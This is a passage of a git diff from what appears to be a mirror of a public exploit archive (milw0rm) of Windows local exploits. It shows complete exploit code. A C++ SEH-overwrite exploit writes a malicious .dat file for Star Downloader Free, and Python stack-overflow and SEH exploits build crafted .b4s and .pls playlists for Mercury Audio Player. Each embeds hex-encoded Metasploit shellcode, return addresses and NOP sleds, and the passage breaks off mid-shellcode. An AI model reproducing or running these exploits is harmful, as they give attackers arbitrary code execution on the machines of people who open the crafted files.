+"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"
+"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"
+"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"
+"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
+"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"
+"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
+"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
+"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"
+"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
+"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"
+"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"
+"\x4e\x46\x43\x36\x42\x50\x5a")
+ex = header+junk+eip+nops+shellcode
+file=open("Exploit.pls","w")
+file.write(ex)
+file.close()
+
+# milw0rm.com [2009-04-14]
diff --git a/platforms/windows/local/844.asm b/platforms/windows/local/844.asm
index bc76cbf5d..808336bd1 100755
--- a/platforms/windows/local/844.asm
+++ b/platforms/windows/local/844.asm
@@ -69,6 +69,6 @@ start:
      .ENDIF
     invoke RegCloseKey , TheReturn
    Invoke ExitProcess,0
-end start
-
-; milw0rm.com [2005-02-26]
+end start
+
+; milw0rm.com [2005-02-26]
diff --git a/platforms/windows/local/8444.cpp b/platforms/windows/local/8444.cpp
index 0cb187c7a..423c38898 100755
--- a/platforms/windows/local/8444.cpp
+++ b/platforms/windows/local/8444.cpp
@@ -1,111 +1,111 @@
-/*    
-  :::::::-.   ...    ::::::.    :::.
-   ;;,   `';, ;;     ;;;`;;;;,  `;;;
-   `[[     [[[['     [[[  [[[[[. '[[
-    $$,    $$$$      $$$  $$$ "Y$c$$
-    888_,o8P'88    .d888  888    Y88
-    MMMMP"`   "YmmMMMM""  MMM     YM
-   [ Discovered and Exploited by dun ]
-
-
- [ Star Downloader Free <= v1.45 ] (.dat) Universal SEH Overwrite Exploit
-
- Vendor:    http://www.stardownloader.com
- Download:  http://www.stardownloader.com/sdfree.exe
- 
- Vuln:
- LocalFileName=A x 1398
- 
- 1 run this expl( create file pwn.dat in  "C:\Program Files\Star Downloader\Partial Downloads\" directory )
- 2 now run Star Downloader Free
- 3 .. ;0
-
- [ dun'at'strcpy.pl / 2009 ] 
-*/
-
-
-#include <windows.h>
-#include <stdio.h>
-
-/*
-
-/SafeSEH OFF     0x10000000    0x10025000    1, 0, 0, 1   C:\Program Files\Star Downloader\NSHelper.dll
-
-C:\crack>Findjmp2.exe "C:\Program Files\Star Downloader\NSHelper.dll" EBX
-...
-0x100112C2      pop EBX - pop - ret
-...
-*/
-
-#define RET   0x100112C2      // pop-pop-ret
-#define JMP   0x909011EB      // short jump (jmp 11)
-#define NOP   0x90
-#define LEN   1390+4+4+40+343
-
-
-char header1[] =
-"\x5B\x4F\x70\x74\x69\x6F\x6E\x73\x5D\x0A\x0A\x55\x52\x4C\x3D\x68"
-"\x74\x74\x70\x3A\x2F\x2F\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D"
-"\x0A\x4C\x6F\x63\x61\x6C\x46\x69\x6C\x65\x4E\x61\x6D\x65\x3D";
-
-char header2[] = 
-"\x0A\x53\x74\x61\x74\x75\x73\x3D\x53\x63\x68\x65\x64\x75\x6C\x65"
-"\x64\x0A\x46\x69\x6C\x65\x53\x69\x7A\x65\x3D\x30\x0A\x4E\x75\x6D"
-"\x4F\x66\x50\x61\x72\x74\x73\x3D\x2D\x31\x0A\x43\x61\x74\x65\x67"
-"\x6F\x72\x79\x3D\x0A\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6F\x6E"
-"\x3D\x0A";
-
-// win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
-char scode[] =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
-"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47"
-"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48"
-"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38"
-"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
-"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
-"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48"
-"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44"
-"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48"
-"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33"
-"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37"
-"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a"
-"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b"
-"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53"
-"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57"
-"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59"
-"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56"
-"\x4e\x56\x43\x46\x42\x30\x5a";
-
-
-int main() {
-    
-FILE *file;
-
-char buf[LEN+1];
-char *ptr=buf;
-
-
-memset(buf,NOP,LEN);
-buf[LEN]='\0';
-*(unsigned long *)&buf[1389] = JMP;
-*(unsigned long *)&buf[1393] = RET;
-ptr+=1390+4+4+40;
-memcpy(ptr, scode, strlen(scode));
-
-file=fopen("C:\\Program Files\\Star Downloader\\Partial Downloads\\pwn.dat","w");
-
-fputs(header1,file);
-fputs(buf,file);
-fputs(header2,file);
-
-fclose(file);
-
-printf("Done..\n");
- return 0;   
-}
-
-// milw0rm.com [2009-04-15]
+/*    
+  :::::::-.   ...    ::::::.    :::.
+   ;;,   `';, ;;     ;;;`;;;;,  `;;;
+   `[[     [[[['     [[[  [[[[[. '[[
+    $$,    $$$$      $$$  $$$ "Y$c$$
+    888_,o8P'88    .d888  888    Y88
+    MMMMP"`   "YmmMMMM""  MMM     YM
+   [ Discovered and Exploited by dun ]
+
+
+ [ Star Downloader Free <= v1.45 ] (.dat) Universal SEH Overwrite Exploit
+
+ Vendor:    http://www.stardownloader.com
+ Download:  http://www.stardownloader.com/sdfree.exe
+ 
+ Vuln:
+ LocalFileName=A x 1398
+ 
+ 1 run this expl( create file pwn.dat in  "C:\Program Files\Star Downloader\Partial Downloads\" directory )
+ 2 now run Star Downloader Free
+ 3 .. ;0
+
+ [ dun'at'strcpy.pl / 2009 ] 
+*/
+
+
+#include <windows.h>
+#include <stdio.h>
+
+/*
+
+/SafeSEH OFF     0x10000000    0x10025000    1, 0, 0, 1   C:\Program Files\Star Downloader\NSHelper.dll
+
+C:\crack>Findjmp2.exe "C:\Program Files\Star Downloader\NSHelper.dll" EBX
+...
+0x100112C2      pop EBX - pop - ret
+...
+*/
+
+#define RET   0x100112C2      // pop-pop-ret
+#define JMP   0x909011EB      // short jump (jmp 11)
+#define NOP   0x90
+#define LEN   1390+4+4+40+343
+
+
+char header1[] =
+"\x5B\x4F\x70\x74\x69\x6F\x6E\x73\x5D\x0A\x0A\x55\x52\x4C\x3D\x68"
+"\x74\x74\x70\x3A\x2F\x2F\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D"
+"\x0A\x4C\x6F\x63\x61\x6C\x46\x69\x6C\x65\x4E\x61\x6D\x65\x3D";
+
+char header2[] = 
+"\x0A\x53\x74\x61\x74\x75\x73\x3D\x53\x63\x68\x65\x64\x75\x6C\x65"
+"\x64\x0A\x46\x69\x6C\x65\x53\x69\x7A\x65\x3D\x30\x0A\x4E\x75\x6D"
+"\x4F\x66\x50\x61\x72\x74\x73\x3D\x2D\x31\x0A\x43\x61\x74\x65\x67"
+"\x6F\x72\x79\x3D\x0A\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6F\x6E"
+"\x3D\x0A";
+
+// win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
+char scode[] =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
+"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47"
+"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48"
+"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38"
+"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
+"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
+"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48"
+"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44"
+"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48"
+"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33"
+"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37"
+"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a"
+"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b"
+"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53"
+"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57"
+"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59"
+"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56"
+"\x4e\x56\x43\x46\x42\x30\x5a";
+
+
+int main() {
+    
+FILE *file;
+
+char buf[LEN+1];
+char *ptr=buf;
+
+
+memset(buf,NOP,LEN);
+buf[LEN]='\0';
+*(unsigned long *)&buf[1389] = JMP;
+*(unsigned long *)&buf[1393] = RET;
+ptr+=1390+4+4+40;
+memcpy(ptr, scode, strlen(scode));
+
+file=fopen("C:\\Program Files\\Star Downloader\\Partial Downloads\\pwn.dat","w");
+
+fputs(header1,file);
+fputs(buf,file);
+fputs(header2,file);
+
+fclose(file);
+
+printf("Done..\n");
+ return 0;   
+}
+
+// milw0rm.com [2009-04-15]
diff --git a/platforms/windows/local/846.cpp b/platforms/windows/local/846.cpp
index 696095e80..6cdde8cb6 100755
--- a/platforms/windows/local/846.cpp
+++ b/platforms/windows/local/846.cpp
@@ -66,6 +66,6 @@ int main(void)
         }
 
        return 0;
-}
-
-// milw0rm.com [2005-02-27]
+}
+
+// milw0rm.com [2005-02-27]
diff --git a/platforms/windows/local/848.asm b/platforms/windows/local/848.asm
index ce11238d4..10a4889a4 100755
--- a/platforms/windows/local/848.asm
+++ b/platforms/windows/local/848.asm
@@ -68,6 +68,6 @@ start:
      .ENDIF
     invoke RegCloseKey , TheReturn
    Invoke ExitProcess,0
-end start
-
-; milw0rm.com [2005-02-28]
+end start
+
+; milw0rm.com [2005-02-28]
diff --git a/platforms/windows/local/8580.py b/platforms/windows/local/8580.py
index 57491020d..72c03e8b8 100755
--- a/platforms/windows/local/8580.py
+++ b/platforms/windows/local/8580.py
@@ -1,76 +1,76 @@
-#usage: exploit.py
-print "**************************************************************************"
-print " Mercury Audio Player 1.21 (.b4s) Local Stack Overflow\n"
-print " Refer: http://www.milw0rm.com/exploits/8578"
-print " Exploit code: His0k4"
-print " Tested on: Windows XP Pro SP3 (EN)\n"
-print " greetz: TO ELITE ALGERIANS,snakespc.com\n"
-print "**************************************************************************"
-         	
-
-header1 = (
-"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31"
-"\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x27\x55\x54"
-"\x46\x2d\x38\x27\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d"
-"\x22\x79\x65\x73\x22\x3f\x3e\x0d\x0a\x3c\x21\x2d\x2d\x20\x54\x68"
-"\x65\x20\x74\x61\x67\x20\x62\x65\x6c\x6f\x77\x20\x70\x72\x6f\x76"
-"\x69\x64\x65\x73\x20\x63\x6f\x6d\x70\x61\x74\x69\x62\x69\x6c\x69"
-"\x74\x79\x20\x77\x69\x74\x68\x20\x57\x69\x6e\x61\x6d\x70\x33\x20"
-"\x2d\x2d\x3e\x0d\x0a\x20\x3c\x57\x69\x6e\x61\x6d\x70\x58\x4d\x4c"
-"\x3e\x0d\x0a\x3c\x21\x2d\x2d\x20\x47\x65\x6e\x65\x72\x61\x74\x65"
-"\x64\x20\x62\x79\x20\x4d\x65\x72\x63\x75\x72\x79\x20\x41\x75\x64"
-"\x69\x6f\x20\x50\x6c\x61\x79\x65\x72\x20\x31\x2e\x32\x31\x20\x2d"
-"\x2d\x3e\x0d\x0a\x20\x20\x3c\x70\x6c\x61\x79\x6c\x69\x73\x74\x20"
-"\x6e\x75\x6d\x5f\x65\x6e\x74\x72\x69\x65\x73\x3d\x22\x31\x22\x20"
-"\x6c\x61\x62\x65\x6c\x3d\x22\x50\x6c\x61\x79\x6c\x69\x73\x74\x20"
-"\x30\x30\x31\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x65\x6e\x74\x72"
-"\x79\x20\x50\x6c\x61\x79\x73\x74\x72\x69\x6e\x67\x3d\x22\x66\x69"
-"\x6c\x65\x3a")
-
-header2 = (
-"\x2e\x6d\x70\x33\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x4e"
-"\x61\x6d\x65\x3e\x20\x2d\x20\x3c\x2f\x4e\x61\x6d\x65\x3e\x0d\x0a"
-"\x20\x20\x20\x20\x3c\x2f\x65\x6e\x74\x72\x79\x3e\x0d\x0a\x20\x20"
-"\x3c\x2f\x70\x6c\x61\x79\x6c\x69\x73\x74\x3e\x0d\x0a\x20\x3c\x2f"
-"\x57\x69\x6e\x61\x6d\x70\x58\x4d\x4c\x3e\x0d\x0a")
-			
-buff = "\x41" * 800
-jump = "\x67\x86\x86\x7C" # jmp esp kernerl32.dll
-nops = "\x90"*6
-
-# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
-shellcode = (
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
-"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x54\x4e\x53\x4b\x38\x4e\x47"
-"\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x58"
-"\x4f\x45\x42\x32\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x38"
-"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
-"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
-"\x46\x4f\x4b\x33\x46\x35\x46\x42\x46\x30\x45\x37\x45\x4e\x4b\x58"
-"\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x54"
-"\x4b\x38\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x31\x4b\x58"
-"\x41\x50\x4b\x4e\x49\x38\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x43"
-"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x43\x45\x48\x42\x4c\x4a\x47"
-"\x4e\x50\x4b\x48\x42\x34\x4e\x30\x4b\x48\x42\x47\x4e\x51\x4d\x4a"
-"\x4b\x38\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b"
-"\x42\x30\x42\x30\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x55\x41\x43"
-"\x48\x4f\x42\x46\x48\x55\x49\x58\x4a\x4f\x43\x58\x42\x4c\x4b\x37"
-"\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x59"
-"\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x56\x41\x56"
-"\x4e\x56\x43\x36\x42\x30\x5a")
-
-exploit = header1 + buff + jump + nops + shellcode + header2
-
-try:
-    out_file = open("exploit.b4s",'w')
-    out_file.write(exploit)
-    out_file.close()
-    raw_input("\nExploit file created!\n")
-except:
-    print "Error"
-
-# milw0rm.com [2009-04-30]
+#usage: exploit.py
+print "**************************************************************************"
+print " Mercury Audio Player 1.21 (.b4s) Local Stack Overflow\n"
+print " Refer: http://www.milw0rm.com/exploits/8578"
+print " Exploit code: His0k4"
+print " Tested on: Windows XP Pro SP3 (EN)\n"
+print " greetz: TO ELITE ALGERIANS,snakespc.com\n"
+print "**************************************************************************"
+         	
+
+header1 = (
+"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31"
+"\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x27\x55\x54"
+"\x46\x2d\x38\x27\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d"
+"\x22\x79\x65\x73\x22\x3f\x3e\x0d\x0a\x3c\x21\x2d\x2d\x20\x54\x68"
+"\x65\x20\x74\x61\x67\x20\x62\x65\x6c\x6f\x77\x20\x70\x72\x6f\x76"
+"\x69\x64\x65\x73\x20\x63\x6f\x6d\x70\x61\x74\x69\x62\x69\x6c\x69"
+"\x74\x79\x20\x77\x69\x74\x68\x20\x57\x69\x6e\x61\x6d\x70\x33\x20"
+"\x2d\x2d\x3e\x0d\x0a\x20\x3c\x57\x69\x6e\x61\x6d\x70\x58\x4d\x4c"
+"\x3e\x0d\x0a\x3c\x21\x2d\x2d\x20\x47\x65\x6e\x65\x72\x61\x74\x65"
+"\x64\x20\x62\x79\x20\x4d\x65\x72\x63\x75\x72\x79\x20\x41\x75\x64"
+"\x69\x6f\x20\x50\x6c\x61\x79\x65\x72\x20\x31\x2e\x32\x31\x20\x2d"
+"\x2d\x3e\x0d\x0a\x20\x20\x3c\x70\x6c\x61\x79\x6c\x69\x73\x74\x20"
+"\x6e\x75\x6d\x5f\x65\x6e\x74\x72\x69\x65\x73\x3d\x22\x31\x22\x20"
+"\x6c\x61\x62\x65\x6c\x3d\x22\x50\x6c\x61\x79\x6c\x69\x73\x74\x20"
+"\x30\x30\x31\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x65\x6e\x74\x72"
+"\x79\x20\x50\x6c\x61\x79\x73\x74\x72\x69\x6e\x67\x3d\x22\x66\x69"
+"\x6c\x65\x3a")
+
+header2 = (
+"\x2e\x6d\x70\x33\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x4e"
+"\x61\x6d\x65\x3e\x20\x2d\x20\x3c\x2f\x4e\x61\x6d\x65\x3e\x0d\x0a"
+"\x20\x20\x20\x20\x3c\x2f\x65\x6e\x74\x72\x79\x3e\x0d\x0a\x20\x20"
+"\x3c\x2f\x70\x6c\x61\x79\x6c\x69\x73\x74\x3e\x0d\x0a\x20\x3c\x2f"
+"\x57\x69\x6e\x61\x6d\x70\x58\x4d\x4c\x3e\x0d\x0a")
+			
+buff = "\x41" * 800
+jump = "\x67\x86\x86\x7C" # jmp esp kernerl32.dll
+nops = "\x90"*6
+
+# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
+shellcode = (
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
+"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x54\x4e\x53\x4b\x38\x4e\x47"
+"\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x58"
+"\x4f\x45\x42\x32\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x38"
+"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
+"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
+"\x46\x4f\x4b\x33\x46\x35\x46\x42\x46\x30\x45\x37\x45\x4e\x4b\x58"
+"\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x54"
+"\x4b\x38\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x31\x4b\x58"
+"\x41\x50\x4b\x4e\x49\x38\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x43"
+"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x43\x45\x48\x42\x4c\x4a\x47"
+"\x4e\x50\x4b\x48\x42\x34\x4e\x30\x4b\x48\x42\x47\x4e\x51\x4d\x4a"
+"\x4b\x38\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b"
+"\x42\x30\x42\x30\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x55\x41\x43"
+"\x48\x4f\x42\x46\x48\x55\x49\x58\x4a\x4f\x43\x58\x42\x4c\x4b\x37"
+"\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x59"
+"\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x56\x41\x56"
+"\x4e\x56\x43\x36\x42\x30\x5a")
+
+exploit = header1 + buff + jump + nops + shellcode + header2
+
+try:
+    out_file = open("exploit.b4s",'w')
+    out_file.write(exploit)
+    out_file.close()
+    raw_input("\nExploit file created!\n")
+except:
+    print "Error"
+
+# milw0rm.com [2009-04-30]
diff --git a/platforms/windows/local/8582.py b/platforms/windows/local/8582.py
index 7cf51cfff..d3f251f81 100755
--- a/platforms/windows/local/8582.py
+++ b/platforms/windows/local/8582.py
@@ -1,49 +1,49 @@
-#usage: exploit.py
-print "**************************************************************************"
-print " Mercury Audio Player 1.21 (.pls) Seh Overwrite Exploit\n"
-print " Refer: http://www.milw0rm.com/exploits/8578"
-print " Exploit code: His0k4"
-print " Tested on: Windows XP Pro SP3 (EN)\n"
-print " greetz: TO ELITE ALGERIANS,snakespc.com\n"
-print "**************************************************************************"
-         	
-
-header1 = (
-"\x5b\x50\x6c\x61\x79\x6c\x69\x73\x74\x5d\x0d\x0a\x46\x69\x6c\x65"
-"\x31\x3d")
-
-header2 = (
-"\x2e\x6d\x70\x33\x0d\x0a\x54\x69\x74\x6c\x65\x31\x3d\x20\x73\x69"
-"\x6c\x65\x6e\x63\x65\x20\x69\x73\x20\x67\x6f\x6c\x64\x0d\x0a\x4e"
-"\x75\x6d\x62\x65\x72\x4f\x66\x45\x6e\x74\x72\x69\x65\x73\x3d\x31"
-"\x0d\x0a\x56\x65\x72\x73\x69\x6f\x6e\x3d\x32\x0d\x0a")
-			
-buff = "\x41" * 31
-next_seh = "\xEB\x06\x90\x90"
-seh = "\xB8\x15\xD1\x72" #msacm32.drv
-junk = "\x41"*3000
-
-# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
-shellcode = (
-"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8"
-"\x61\xfb\x36\x83\xeb\xfc\xe2\xf4\x14\x89\xbf\x36\xe8\x61\x70\x73"
-"\xd4\xea\x87\x33\x90\x60\x14\xbd\xa7\x79\x70\x69\xc8\x60\x10\x7f"
-"\x63\x55\x70\x37\x06\x50\x3b\xaf\x44\xe5\x3b\x42\xef\xa0\x31\x3b"
-"\xe9\xa3\x10\xc2\xd3\x35\xdf\x32\x9d\x84\x70\x69\xcc\x60\x10\x50"
-"\x63\x6d\xb0\xbd\xb7\x7d\xfa\xdd\x63\x7d\x70\x37\x03\xe8\xa7\x12"
-"\xec\xa2\xca\xf6\x8c\xea\xbb\x06\x6d\xa1\x83\x3a\x63\x21\xf7\xbd"
-"\x98\x7d\x56\xbd\x80\x69\x10\x3f\x63\xe1\x4b\x36\xe8\x61\x70\x5e"
-"\xd4\x3e\xca\xc0\x88\x37\x72\xce\x6b\xa1\x80\x66\x80\x91\x71\x32"
-"\xb7\x09\x63\xc8\x62\x6f\xac\xc9\x0f\x02\x9a\x5a\x8b\x61\xfb\x36")
-
-exploit = header1 + buff + next_seh + seh + shellcode + junk + header2
-
-try:
-    out_file = open("exploit.pls",'w')
-    out_file.write(exploit)
-    out_file.close()
-    raw_input("\nExploit file created!\n")
-except:
-    print "Error"
-
-# milw0rm.com [2009-04-30]
+#usage: exploit.py
+print "**************************************************************************"
+print " Mercury Audio Player 1.21 (.pls) Seh Overwrite Exploit\n"
+print " Refer: http://www.milw0rm.com/exploits/8578"
+print " Exploit code: His0k4"
+print " Tested on: Windows XP Pro SP3 (EN)\n"
+print " greetz: TO ELITE ALGERIANS,snakespc.com\n"
+print "**************************************************************************"
+         	
+
+header1 = (
+"\x5b\x50\x6c\x61\x79\x6c\x69\x73\x74\x5d\x0d\x0a\x46\x69\x6c\x65"
+"\x31\x3d")
+
+header2 = (
+"\x2e\x6d\x70\x33\x0d\x0a\x54\x69\x74\x6c\x65\x31\x3d\x20\x73\x69"
+"\x6c\x65\x6e\x63\x65\x20\x69\x73\x20\x67\x6f\x6c\x64\x0d\x0a\x4e"
+"\x75\x6d\x62\x65\x72\x4f\x66\x45\x6e\x74\x72\x69\x65\x73\x3d\x31"
+"\x0d\x0a\x56\x65\x72\x73\x69\x6f\x6e\x3d\x32\x0d\x0a")
+			
+buff = "\x41" * 31
+next_seh = "\xEB\x06\x90\x90"
+seh = "\xB8\x15\xD1\x72" #msacm32.drv
+junk = "\x41"*3000
+
+# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
+shellcode = (
+"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8"
+"\x61\xfb\x36\x83\xeb\xfc\xe2\xf4\x14\x89\xbf\x36\xe8\x61\x70\x73"
+"\xd4\xea\x87\x33\x90\x60\x14\xbd\xa7\x79\x70\x69\xc8\x60\x10\x7f"
+"\x63\x55\x70\x37\x06\x50\x3b\xaf\x44\xe5\x3b\x42\xef\xa0\x31\x3b"
